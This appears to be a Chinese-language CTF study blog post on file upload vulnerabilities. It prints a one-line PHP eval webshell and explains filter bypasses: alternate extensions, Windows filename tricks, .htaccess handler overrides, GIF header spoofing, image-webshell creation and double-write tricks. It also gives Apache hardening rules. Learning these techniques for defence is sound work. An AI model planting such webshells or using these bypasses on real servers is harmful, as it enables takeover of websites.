

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jiashi">
  <meta name="keywords" content="">
  
    <meta name="description" content="文件上传文件上传漏洞概述   值 描述    application&#x2F;x-www-form-urlencoded 默认，在发送前对所有字符进行编码（将空格转换成”+“符号，特殊字符转成ASCII HEX值）。将表单中的数据变为键值对的形式如果action为get，则将表单中的数据转换成一个字符串(name1&#x3D;value1&amp;name2&#x3D;value2)，然后把这个">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传">
<meta property="og:url" content="https://jiashi19.gitee.io/2023/09/27/ctf-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="Blog from js19">
<meta property="og:description" content="文件上传文件上传漏洞概述   值 描述    application&#x2F;x-www-form-urlencoded 默认，在发送前对所有字符进行编码（将空格转换成”+“符号，特殊字符转成ASCII HEX值）。将表单中的数据变为键值对的形式如果action为get，则将表单中的数据转换成一个字符串(name1&#x3D;value1&amp;name2&#x3D;value2)，然后把这个">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2023/09/22/gpfAxnuyeXzh32j.png">
<meta property="og:image" content="https://s2.loli.net/2023/09/22/2glOqDAMapuYI4P.png">
<meta property="og:image" content="https://s2.loli.net/2023/09/22/3vlMOEcDTFUymb5.png">
<meta property="og:image" content="https://s2.loli.net/2023/10/26/mnCRELWgDAZNO5d.png">
<meta property="og:image" content="https://s2.loli.net/2023/10/26/7fsbOxUGq4yHjwV.png">
<meta property="article:published_time" content="2023-09-27T01:32:01.000Z">
<meta property="article:modified_time" content="2023-11-16T01:38:58.049Z">
<meta property="article:author" content="Jiashi">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://s2.loli.net/2023/09/22/gpfAxnuyeXzh32j.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>文件上传 - Blog from js19</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"jiashi19.gitee.io","root":"/","version":"1.9.5-a","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>jiashi&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件上传"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-09-27 09:32" pubdate>
          2023年9月27日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          28 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">文件上传</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><h2 id="文件上传漏洞概述"><a href="#文件上传漏洞概述" class="headerlink" title="文件上传漏洞概述"></a>文件上传漏洞概述</h2><table>
<thead>
<tr>
<th>值</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>application&#x2F;x-www-form-urlencoded</td>
<td>默认，在发送前对所有字符进行编码（将空格转换成”+“符号，特殊字符转成ASCII HEX值）。将表单中的数据变为键值对的形式如果action为get，则将表单中的数据转换成一个字符串(name1&#x3D;value1&amp;name2&#x3D;value2)，然后把这个字符串附加到URL后面，并用?分割如果action为post，浏览器把form数据封装到http body中，然后发送到服务器</td>
</tr>
<tr>
<td>multipart&#x2F;form-data</td>
<td>不对字符编码。当表单中有<strong>文件上传</strong>控件时该值是必须的。专门用来传输特殊类型数据的，比如文件，会将表单中的数据变成二进制数据，这时候如果用request是无法获取到相应表单的值，应通过<strong>stream流</strong>对象，将传到服务器端的二进制数据解码，从而读取数据</td>
</tr>
<tr>
<td>text&#x2F;plain</td>
<td>将空格转换成”+“符号，但不编码特殊字符。表单以纯文本形式进行编码</td>
</tr>
</tbody></table>
<h3 id="webshell"><a href="#webshell" class="headerlink" title="webshell"></a>webshell</h3><p>webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来访问该后门文件了，从而得到一个命令执行环境，以达到控制网站服务器的目的。</p>
<p>最普遍的一句：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;shell&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>其中eval就是执行命令的函数，$_POST[‘shell’]就是接收的数据。eval函数把接收的数据当作php代码来执行。这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。这便是一句话木马的强大之处。</p>
<h2 id="文件上传检测与绕过"><a href="#文件上传检测与绕过" class="headerlink" title="文件上传检测与绕过"></a>文件上传检测与绕过</h2><h3 id="前端检测与绕过"><a href="#前端检测与绕过" class="headerlink" title="前端检测与绕过"></a>前端检测与绕过</h3><p>burp抓包改文件名</p>
<h3 id="服务端检测与绕过"><a href="#服务端检测与绕过" class="headerlink" title="服务端检测与绕过"></a>服务端检测与绕过</h3><h4 id="后缀名检测与绕过"><a href="#后缀名检测与绕过" class="headerlink" title="后缀名检测与绕过"></a>后缀名检测与绕过</h4><ol>
<li>黑名单列表绕过</li>
</ol>
<p>如果黑名单规则不严谨，在某些特定的环境中，某些特殊的后缀名仍然会被当做php文件解析。</p>
<p>不同后缀：Php|php2|php3|php4|php5|php6|php7|pht|phtm|phtml</p>
<p>也可尝试大小写绕过：</p>
<p>windows对大小写不敏感，linux对大小写敏感</p>
<ol start="2">
<li>windows特性</li>
</ol>
<p>windows会自动去掉后面添加的</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-number">1</span><span class="hljs-selector-class">.php</span>.<br><br><span class="hljs-number">1</span><span class="hljs-selector-class">.php</span> (空格)<br><br><span class="hljs-number">1</span><span class="hljs-selector-class">.php</span>::<span class="hljs-variable">$DATA</span><br></code></pre></td></tr></table></figure>

<ol start="3">
<li>.htaccess文件攻击</li>
</ol>
<p>原理： </p>
<ul>
<li>.htaccess 文件提供了针对目录改变配置的方法， 即在一个特定的文档目录中放置一个包含一条或多条指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。<strong>管理员可以通过 Apache 的 AllowOverride 指令来设置</strong>（该参数在httpd.conf中进行设置）。 </li>
<li>htaccess 中有 # 单行注释符, 且支持 \拼接上下两行</li>
</ul>
<p>以下为匹配文件名的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs .htaccess">&lt;FilesMatch &quot;1.jpg&quot;&gt;    <br>	SetHandler application/x-httpd-php <br>&lt;/FilesMatch&gt;<br></code></pre></td></tr></table></figure>

<ol start="4">
<li>结合apache文件解析机制，从右到左开始解析文件后缀，若文件名不可识别，则继续判断直到遇到可解析的后缀为止。</li>
</ol>
<p><code>1.php.xxx</code></p>
<p>其实,apache本身根本不存在所谓的解析漏洞.<br>我们回顾一下请求的过程（1.php.xxx.yyy）:<br>yyy -&gt;无法识别,向左<br>xxx -&gt;无法识别,向左<br>php -&gt;发现后缀是php，交给php处理这个文件<br>最后一步虽然交给了php来处理这个文件，但是php也不认识.yyy的后缀啊，所以就直接输出了。</p>
<p>解析漏洞的产生，是由于运维人员在配置服务器时，为了使apache服务器能解析php，而自己添加一个handler，例如：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs applescript">AddHandler <span class="hljs-built_in">application</span>/x-httpd-php.php<br></code></pre></td></tr></table></figure>

<p>它的作用也是为了让apache把php文件交给phpmodule解析，但是注意到它与SetHandler:它的后缀不是用正则去匹配的。所以,在文件名的任何位置匹配到php后缀，它都会让php_module解析。</p>
<p>修复方法<br>不要使用AddHandler,改用SetHandler,写好正则,就不会有解析问题，</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">&lt;FilesMatch <span class="hljs-string">&quot;.+ \.php$&quot;</span>&gt;<br>SetHandler application/x-httpd-php<br>&lt;<span class="hljs-string">/FilesMatch</span>&gt;<br>禁止<span class="hljs-string">.php.</span>这样的文件执行，<br>&lt;FilesMatch<span class="hljs-string">&quot;.+\.ph(p[3457]?|t|tml)\.&quot;</span>&gt;<br>Require all denied<br>&lt;<span class="hljs-string">/FilesMatch</span>&gt;<br></code></pre></td></tr></table></figure>



<ol start="5">
<li>IIS解析漏洞</li>
</ol>
<p><strong>IlS 6.0</strong>在处理含有特殊符号的文件路径时会出现逻辑错误，从而造成文件解析漏洞。这—漏洞有两种完全不同的利用方式:<br>&#x2F;test.asp&#x2F;test.jpg<br>test.asp;.jpg</p>
<h4 id="MIME类型检测与绕过"><a href="#MIME类型检测与绕过" class="headerlink" title="MIME类型检测与绕过"></a>MIME类型检测与绕过</h4><p>Content-Type字段表示文件的MIME类型。</p>
<p>注意该字段的值即可。</p>
<h4 id="文件内容检测与绕过"><a href="#文件内容检测与绕过" class="headerlink" title="文件内容检测与绕过"></a>文件内容检测与绕过</h4><p>一个方法是：上传一张图片，然后在尾部加上一句话木马（同样使用burpsuite）。问题:在传入一张正常图片，然后在burp里面拦截并尾部加上一句话木马后，显示上传成功，但是却无法读取，在前端访问显示error；最后删去了很长一段图片内容，再次上传，可以成功连接；</p>
<p>还有一方法为直接制作图片马：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ copy 1.jpg/b +1.php/a 2.jpg<br></code></pre></td></tr></table></figure>

<p>实验：</p>
<p>将上传的一句话木马文件改名绕过前端：</p>
<p>muma.php—&gt;muma.jpeg</p>
<p><img src="https://s2.loli.net/2023/09/22/gpfAxnuyeXzh32j.png" srcset="/img/loading.gif" lazyload alt="image-20230922102923688"></p>
<p>burp抓包，改回php后缀名，并且加上GIF89a(gif的文件头)</p>
<p><img src="https://s2.loli.net/2023/09/22/2glOqDAMapuYI4P.png" srcset="/img/loading.gif" lazyload alt="image-20230922102655658"></p>
<p>但是试了GIF8, 也可以上传成功</p>
<p><img src="https://s2.loli.net/2023/09/22/3vlMOEcDTFUymb5.png" srcset="/img/loading.gif" lazyload alt="image-20230922111052350"></p>
<p><img src="https://s2.loli.net/2023/10/26/mnCRELWgDAZNO5d.png" srcset="/img/loading.gif" lazyload alt="image-20230922111145578"></p>
<p>GIF8—47494638  已经是文件头了 </p>
<p>常见图片文件头：</p>
<table>
<thead>
<tr>
<th>文件类型</th>
<th>后缀</th>
<th>文件头</th>
<th>文件尾</th>
<th>标志</th>
</tr>
</thead>
<tbody><tr>
<td>JPEG</td>
<td>.jpg&#x2F;.jpeg</td>
<td>FFD8FF</td>
<td>FFD9</td>
<td>JFIF</td>
</tr>
<tr>
<td>PNG</td>
<td>.png</td>
<td>89504E47</td>
<td>AE426082</td>
<td>PNG IEND IHDR</td>
</tr>
<tr>
<td>GIF</td>
<td>.gif</td>
<td>47494638</td>
<td>003B</td>
<td>GIT9a</td>
</tr>
<tr>
<td>TIFF</td>
<td>.tif&#x2F;.tiff</td>
<td>49492A00</td>
<td>4D4D2A00</td>
<td>- II MM</td>
</tr>
</tbody></table>
<h4 id="00截断检测与绕过"><a href="#00截断检测与绕过" class="headerlink" title="00截断检测与绕过"></a>00截断检测与绕过</h4><p>截断条件：php版本小于5.3.4</p>
<h4 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h4><p>以下为示例检测代码：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-variable">$name</span> = basename(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>]);<br><span class="hljs-variable">$blacklist</span> = array(<span class="hljs-string">&quot;php&quot;</span>, <span class="hljs-string">&quot;php5&quot;</span>, <span class="hljs-string">&quot;php4&quot;</span>, <span class="hljs-string">&quot;php3&quot;</span>, <span class="hljs-string">&quot;phtml&quot;</span>, <span class="hljs-string">&quot;pht&quot;</span>, <span class="hljs-string">&quot;jsp&quot;</span>, <span class="hljs-string">&quot;jspa&quot;</span>, <span class="hljs-string">&quot;jspx&quot;</span>, <span class="hljs-string">&quot;jsw&quot;</span>, <span class="hljs-string">&quot;jsv&quot;</span>, <span class="hljs-string">&quot;jspf&quot;</span>, <span class="hljs-string">&quot;jtml&quot;</span>, <span class="hljs-string">&quot;asp&quot;</span>, <span class="hljs-string">&quot;aspx&quot;</span>, <span class="hljs-string">&quot;asa&quot;</span>, <span class="hljs-string">&quot;asax&quot;</span>, <span class="hljs-string">&quot;ascx&quot;</span>, <span class="hljs-string">&quot;ashx&quot;</span>, <span class="hljs-string">&quot;asmx&quot;</span>, <span class="hljs-string">&quot;cer&quot;</span>, <span class="hljs-string">&quot;swf&quot;</span>, <span class="hljs-string">&quot;htaccess&quot;</span>, <span class="hljs-string">&quot;ini&quot;</span>);<br><span class="hljs-variable">$name</span> = str_ireplace(<span class="hljs-variable">$blacklist</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$name</span>);<br><span class="hljs-regexp">//</span>code from ctfhub<br></code></pre></td></tr></table></figure>

<h4 id="条件竞争检测与绕过"><a href="#条件竞争检测与绕过" class="headerlink" title="条件竞争检测与绕过"></a>条件竞争检测与绕过</h4><p>略</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/linfangnan/p/15784968.html">https://www.cnblogs.com/linfangnan/p/15784968.html</a></p>
<p><img src="https://s2.loli.net/2023/10/26/7fsbOxUGq4yHjwV.png" srcset="/img/loading.gif" lazyload alt="2fc0902942b46dcad0a5b6a23f693363"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F/" class="category-chain-item">渗透</a>
  
  

      </span>
    
  
    
      <span class="category-chain">
        
  <a href="/categories/ctf-web/" class="category-chain-item">ctf-web</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件上传</div>
      <div>https://jiashi19.gitee.io/2023/09/27/ctf-文件上传/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Jiashi</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年9月27日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/10/03/%E7%88%86%E7%A0%B4-token%E7%BB%95%E8%BF%87/" title="爆破-token绕过">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">爆破-token绕过</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/18/ctf-web-php/" title="ctf-web练习(php)">
                        <span class="hidden-mobile">ctf-web练习(php)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
